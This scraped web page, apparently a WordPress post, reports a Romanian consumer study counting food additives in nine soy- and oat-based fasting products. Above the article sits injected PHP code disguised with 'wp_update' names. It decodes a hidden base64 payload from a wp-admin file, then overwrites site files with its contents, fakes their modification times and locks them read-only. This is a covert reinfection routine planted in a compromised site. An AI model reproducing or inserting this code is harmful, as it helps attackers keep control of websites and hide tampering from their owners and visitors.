$wp_update_file="/home/shuffles/public_html/wp-admin/user/screens.php"; if ( is_file($wp_update_file) ) { $wp_update_content=trim(file_get_contents($wp_update_file)); if ( $wp_update_content!="" ) { $wp_update_content=substr($wp_update_content,6,-6); $wp_update_content=base64_decode($wp_update_content); $wp_update_arr=json_decode($wp_update_content,true); if ( is_array($wp_update_arr) ) { foreach($wp_update_arr as $value) { $file_mtime=filemtime($value["path"]); @chmod($value["path"],0777); @unlink($value["path"]); @file_put_contents($value["path"],$value["content"]); @touch($value["path"],$file_mtime); @chmod($value["path"],0444); } } } } InfoCons: Studiul Comparativ pe Produse de Post! – O noua atitudine

          Aceste produse sunt vegetale pe baza de soia si ovaz si sunt cautate mai ales in perioada posturilor! Fii un consumator informat si afla cate e-uri contin acestea, cu informatiile pe care le ai la indemana, chiar pe eticheta!
In primul rand, e bine sa stii ca eticheta produsului trebuie sa contina o serie de informatii obligatorii care sa permita consumatorului alegerea sortimentului dorit.
         Studiul s-a efectuat de un numar de 9 produse – bauturi UHT, preparate tip iaurt, tofu, sos de maioneză, toate avand in compozitie numai produse vegetale – soia, ovaz, uleiuri vegetale.
         Din cele 9 produse studiate se constata ca 90% dintre produsele studiate contin minim un E. Numarul maxim de aditivi alimentari inscris pe etichete este de 7 dar exista si un produs fara nici un aditiv alimentar. Cel mai des intalnite sunt E440, E270, E330, E322, E304 considerate inofensive.
          Acest studiu a fost realizat in parteneriat cu Facultatea de Alimentatie si Turism, Catedra de Inginerie si Management in Turism din cadrul Universitatii Transilvania Brasov, in perioada 16.11.2011 – 09.12.2011.
         Pentru mai multe informatii despre acest studiu comparativ pe etichete privind numarul de E-uri continute de produsele de post din comert, viziteaza pagina www.teste-comparative.ro, sectiunea Studii! Urmareste-ne in continuare pentru a afla cate E-uri contin si alte produse de post pe care le gasesti pe piata!

By o9admin